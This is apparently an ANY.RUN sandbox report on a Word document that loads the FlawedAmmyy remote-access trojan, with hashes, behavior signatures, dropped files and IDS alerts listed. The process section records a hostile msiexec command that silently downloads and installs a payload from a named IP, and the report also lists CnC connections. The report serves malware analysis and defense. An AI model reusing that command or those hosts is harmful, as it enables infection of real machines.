analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

temp_1545300399719.-2117284857.doc

Full analysis: https://app.any.run/tasks/3db84ed4-cf1f-433d-9c75-05ea9ca7128a
Verdict: Malicious activity
Threats:

FlawedAmmmyy is a RAT type malware that can be used to perform actions remotely on an infected PC. This malware is well known for being featured in especially large campaigns with wide target demographics.

Malware Trends Tracker     >>>
Analysis date: February 19, 2019, 01:54:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
exe-to-msi
rat
flawedammyy
ammyy
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: 1, Author: 1, Template: Normal.dotm, Last Saved By: 1, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Feb 18 20:07:00 2019, Last Saved Time/Date: Mon Feb 18 20:07:00 2019, Number of Pages: 1, Number of Words: 23, Number of Characters: 137, Security: 0
MD5:

93E5AF41B2994E60FE1655994DCC1FC3

SHA1:

0DF9F97D57786EBDC54C95218DE8BB762E32ABBA

SHA256:

32318477E1C624E585C61546FAE2059D2FF8F3732A988E890665C2D81B3651CC

SSDEEP:

768:5pMLELemEgZnQgW5tmhdMgNMVkefr0VTEJ6eSX:5LLemXZQgW5IYgNlPoJ6vX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2968)

    • Uses Microsoft Installer as loader

      • WINWORD.EXE (PID: 2968)

    • Downloads executable files from IP

      • msiexec.exe (PID: 3560)

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3560)

    • Application was dropped or rewritten from another process

      • wsus.exe (PID: 2364)
      • wsus.exe (PID: 3428)

    • Loads the Task Scheduler COM API

      • MSI788F.tmp (PID: 3732)

    • Loads the Task Scheduler DLL interface

      • MSI788F.tmp (PID: 3732)

    • Connects to CnC server

      • wsus.exe (PID: 2364)

    • FLAWEDAMMYY was detected

      • wsus.exe (PID: 2364)

    • Changes the autorun value in the registry

      • MSI788F.tmp (PID: 3732)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3560)
      • MSI788F.tmp (PID: 3732)

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3560)

    • Creates files in the program directory

      • MSI788F.tmp (PID: 3732)

    • Starts CMD.EXE for commands execution

      • MSI788F.tmp (PID: 3732)

    • Creates files in the Windows directory

      • MSI788F.tmp (PID: 3732)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2968)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2968)

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3560)

    • Application was dropped or rewritten from another process

      • MSI788F.tmp (PID: 3732)

    • Starts application with an unusual extension

      • msiexec.exe (PID: 3560)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: ???????? Microsoft Word 97-2003
CompObjUserTypeLen: 32
HeadingPairs:
  • Название
  • 1
TitleOfParts: 1
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 159
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Cyrillic
Security: None
Characters: 137
Words: 23
Pages: 1
ModifyDate: 2019:02:18 20:07:00
CreateDate: 2019:02:18 20:07:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 2
LastModifiedBy: 1
Template: Normal.dotm
Comments: -
Keywords: -
Author: 1
Subject: -
Title: 1
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs msiexec.exe no specs msiexec.exe msi788f.tmp #FLAWEDAMMYY wsus.exe cmd.exe no specs wsus.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2968"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\temp_1545300399719.-2117284857.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2180"C:\Windows\System32\msiexec.exe" back=001 error=exit /i http://185.17.120.235/select /q OnLoad="c:\windows\calc.exe" Aciqy=¶µ±VIks1C:\Windows\System32\msiexec.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3560C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3732"C:\Windows\Installer\MSI788F.tmp"C:\Windows\Installer\MSI788F.tmp
msiexec.exe
User:
admin
Company:
IBM Controler' System Security Control
Integrity Level:
MEDIUM
Description:
IBM Controler' System Security Control
Exit code:
0
Version:
2.8.17228.1
2364"C:\ProgramData\Microsofts Help\wsus.exe"C:\ProgramData\Microsofts Help\wsus.exe
MSI788F.tmp
User:
admin
Company:
Microsoft Block Security
Integrity Level:
MEDIUM
Description:
Microsoft Block Security
Version:
1.18.2.51920
3588"C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSI788F.tmp >> NULC:\Windows\system32\cmd.exeMSI788F.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3428"C:\ProgramData\Microsofts Help\wsus.exe" C:\ProgramData\Microsofts Help\wsus.exetaskeng.exe
User:
admin
Company:
Microsoft Block Security
Integrity Level:
MEDIUM
Description:
Microsoft Block Security
Exit code:
0
Version:
1.18.2.51920
3524"C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSI788F.tmp >> NULC:\Windows\system32\cmd.exeMSI788F.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 258
Read events
817
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
6
Text files
9
Unknown types
6

Dropped files

PID
Process
Filename
Type
2968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6B3E.tmp.cvr
MD5:
SHA256:
2968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFF485E4BC2D964ECE.TMP
MD5:
SHA256:
2968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFC6ECBDCEAF33C2F3.TMP
MD5:
SHA256:
2968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFFB5C5FFA27B3F3D5.TMP
MD5:
SHA256:
3560msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF52490B486BB621BA.TMP
MD5:
SHA256:
2968WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C569802DB5849779F22174B9AB0F135F
SHA256:6C3CAD88468FE63910B07989B21F7D4FABE3C3BD098CFFAF6E32CA3A869558B7
3560msiexec.exeC:\Config.Msi\24769a.rbs
MD5:
SHA256:
3560msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF8EC4B160FCEB9560.TMP
MD5:
SHA256:
3560msiexec.exeC:\Windows\Installer\MSI74C3.tmpexecutable
MD5:C19F4137DA7C2D9E5A6A26EFE3FC0F9A
SHA256:10987FB8AB8275F9DE9B8F4F1434CAC08D03B659BF69F81FDB5659F7A0253079
3732MSI788F.tmpC:\ProgramData\Microsofts Help\template_22e330.DATAHASHbinary
MD5:DA80F64698FDCBE7C3284DF94DCCC6F3
SHA256:1FA3B63B9FD44F2C93B4D513BA33839F56094A2D7886C8E151BB9F11132CF5CD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3732
MSI788F.tmp
GET
200
185.17.120.235:80
http://185.17.120.235/dat1.omg
RU
binary
657 Kb
suspicious
3560
msiexec.exe
GET
200
185.17.120.235:80
http://185.17.120.235/select
RU
executable
168 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2364
wsus.exe
185.99.133.2:80
Zappie Host LLC
NZ
malicious
3732
MSI788F.tmp
185.17.120.235:80
Leaseweb Deutschland GmbH
RU
suspicious
3560
msiexec.exe
185.17.120.235:80
Leaseweb Deutschland GmbH
RU
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
3560
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
3560
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
2364
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] FlawedAmmyy.RAT
2364
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] AMMYY RAT
2364
wsus.exe
A Network Trojan was detected
ET TROJAN Win32/FlawedAmmyy RAT CnC Checkin
2364
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] FlawedAmmyy.RAT Checkin
1 ETPRO signatures available at the full report
Process
Message
MSI788F.tmp
C:\ProgramData\Microsofts Help\template_22e330.DATAHASH
MSI788F.tmp
--End Dowload--
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
temp_1545300399719.-2117284857.doc